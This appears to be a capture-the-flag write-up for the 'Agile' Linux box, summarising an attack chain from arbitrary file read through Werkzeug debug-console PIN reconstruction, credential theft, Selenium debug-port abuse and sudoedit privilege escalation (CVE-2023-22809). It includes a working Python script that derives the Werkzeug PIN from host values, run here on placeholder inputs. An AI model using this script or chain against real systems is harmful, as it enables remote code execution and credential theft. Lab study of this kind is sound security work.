Agile is a medium-difficulty Linux box that features a password management website on port 80. After creating an account and adding a couple of passwords, the website's export-to-CSV functionality is found to be vulnerable to arbitrary file read. Enumeration of the other endpoints shows that `/download` throws an error when accessed and brings up the `Werkzeug` debug console. The console is protected by a PIN; however, because that PIN is derived from values present on the host, combining the console with the file-read vulnerability allows an attacker to reconstruct the PIN and execute system commands as `www-data`. Database credentials can then be identified in order to connect to the password manager's SQL database, which holds credentials for the `corum` user on the system. A second version of the website is found to be running, and an automated system performs tests on it through the `Selenium` web driver. The `Selenium` debug port is open, and through SSH tunnelling an attacker can reach the test environment of the website and acquire credentials for the user `edwards`. Finally, a combination of `CVE-2023-22809`, a custom entry in the global `bashrc` file, and incorrect permissions on a Python virtual environment activation script leads to privilege escalation.
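The PIN step above works because Werkzeug computes the debugger PIN deterministically from a handful of host values that an arbitrary-file-read primitive can fetch. The following is an added example, not code from the box write-up or from Werkzeug itself: it re-implements the public `get_pin_and_cookie_name` algorithm from `werkzeug/debug/__init__.py` (Werkzeug 2.x uses SHA-1; versions before 2.0 used MD5, selectable below) and feeds it constructed placeholder inputs. The username, module path, interface name, MAC, machine-id and cgroup line are all assumptions for illustration; on a real target each of them must be read from the host (for example `/etc/machine-id`, `/proc/self/cgroup`, `/sys/class/net/<iface>/address`) rather than guessed, and the module path depends on the Python version and on how the application was launched.

```python
"""Reconstruct the Werkzeug debugger PIN from host values.

Added example; mirrors the public algorithm in werkzeug/debug/__init__.py
(get_pin_and_cookie_name). All sample inputs below are constructed
placeholders, not values taken from the box.
"""
import hashlib
from itertools import chain


def mac_to_node(mac: str) -> int:
    """uuid.getnode() returns the MAC as an integer and the debugger str()s it.
    /sys/class/net/<iface>/address holds the colon-separated form."""
    return int(mac.replace(":", ""), 16)


def machine_id(machine_id_line: str, cgroup_first_line: str) -> bytes:
    """Werkzeug's get_machine_id() on Linux: first line of /etc/machine-id
    (falling back to /proc/sys/kernel/random/boot_id when it is absent),
    concatenated with the text after the last '/' of the first line of
    /proc/self/cgroup."""
    value = machine_id_line.strip().encode()
    value += cgroup_first_line.strip().rpartition("/")[2].encode()
    return value


def werkzeug_pin(probably_public_bits, private_bits, algo="sha1"):
    """Return (pin, cookie_name) exactly as the debugger derives them.
    algo="md5" reproduces Werkzeug < 2.0."""
    h = hashlib.new(algo)
    for bit in chain(probably_public_bits, private_bits):
        if not bit:                      # None/empty bits are skipped, not hashed
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"
    h.update(b"pinsalt")                 # the PIN is a further-salted digest
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    for group_size in 5, 4, 3:           # 9 digits always end up as ddd-ddd-ddd
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


# Constructed inputs standing in for what the file-read primitive would return.
PUBLIC_BITS = [
    "www-data",                                     # getpass.getuser()
    "flask.app",                                    # app.__module__
    "Flask",                                        # app.__name__ / type(app).__name__
    "/usr/lib/python3/dist-packages/flask/app.py",  # sys.modules[modname].__file__ (assumed path)
]
PRIVATE_BITS = [
    str(mac_to_node("00:11:22:33:44:55")),          # /sys/class/net/eth0/address (assumed iface)
    machine_id("0123456789abcdef0123456789abcdef",   # /etc/machine-id (placeholder)
               "0::/system.slice/app.service"),      # /proc/self/cgroup (placeholder)
]


def demo(algo="sha1"):
    return werkzeug_pin(PUBLIC_BITS, PRIVATE_BITS, algo)


if __name__ == "__main__":
    pin, cookie = demo()
    print(f"PIN {pin}  cookie {cookie}")
```

The practical check when a candidate PIN is rejected is to vary exactly the inputs that are uncertain (interface, Python module path, hash algorithm) rather than the algorithm: any single-byte difference in an input produces an unrelated PIN, which is also why this only works with a real file-read primitive and not from guesses.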